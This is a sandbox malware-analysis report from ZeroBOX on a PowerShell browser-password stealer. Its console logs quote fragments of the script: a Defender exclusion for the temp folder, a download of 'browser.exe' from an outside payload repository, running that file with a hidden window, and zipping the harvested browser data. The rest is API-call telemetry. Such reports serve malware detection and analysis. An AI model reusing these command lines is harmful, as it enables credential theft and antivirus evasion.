Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 9, 2023, 12:55 p.m.	Oct. 9, 2023, 12:57 p.m.

Size	1.1KB
Type	UTF-8 Unicode (with BOM) text
MD5	`781f2735b980b567aa07fec41e6d4422`
SHA256	`99f88559c1bad41ce0c963c16417f308cd40daea673215f25b0f84114aba957e`
CRC32	`AC803148`
ssdeep	`24:O7YTIlXXPlzG7Qj7M1lz8FLfnuwYxFlM2cauMcpOkTlzW3yQe:CV/Z12Z8FLfn2+2ruVTZge`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1
3048

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (37 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1:25 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath $env:tmp console_handle: 0x00000053	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: The term 'iwr' is not recognized as the name of a cmdlet, function, script file console_handle: 0x00000097	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: , or operable program. Check the spelling of the name, or if a path was include console_handle: 0x000000a3	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: d, verify that the path is correct and try again. console_handle: 0x000000af	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1:28 char:4 console_handle: 0x000000bb	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + iwr <<<< "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser console_handle: 0x000000c7	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: .exe?raw=true" -outfile "$env:tmp\browser.exe" console_handle: 0x000000d3	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + CategoryInfo : ObjectNotFound: (iwr:String) [], CommandNotFound console_handle: 0x000000df	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: Exception console_handle: 0x000000eb	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000f7	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: Start-Process : Cannot bind parameter 'WindowStyle'. Cannot convert value "h" t console_handle: 0x00000117	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: o type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration value console_handle: 0x00000123	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: s. Specify one of the following enumeration values and try again. The possible console_handle: 0x0000012f	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000013b	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1:31 char:72 console_handle: 0x00000147	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle <<<< console_handle: 0x00000153	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: h -Wait console_handle: 0x0000015f	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + CategoryInfo : InvalidArgument: (:) [Start-Process], ParameterB console_handle: 0x0000016b	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: indingException console_handle: 0x00000177	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + FullyQualifiedErrorId : CannotConvertArgumentNoMessage,Microsoft.PowerSh console_handle: 0x00000183	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: ell.Commands.StartProcessCommand console_handle: 0x0000018f	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: The term 'Compress-Archive' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Steal_BrowserPassword.ps1:34 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + Compress-Archive <<<< -Path "$env:tmp\results" -DestinationPath $env:tmp\bro console_handle: 0x00000053	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: wserdata.zip console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Compress-Archive:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 9, 2023, 12:55 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (10 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 9, 2023, 12:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ce640 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 9, 2023, 12:55 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (25 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06480000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06481000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06482000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06483000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02649000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05623000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05624000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05625000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06484000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06485000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06488000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0648c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0649d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0649e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0649f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05626000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05446000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 9, 2023, 12:55 p.m.	process_identifier: 3048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steal_BrowserPassword.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All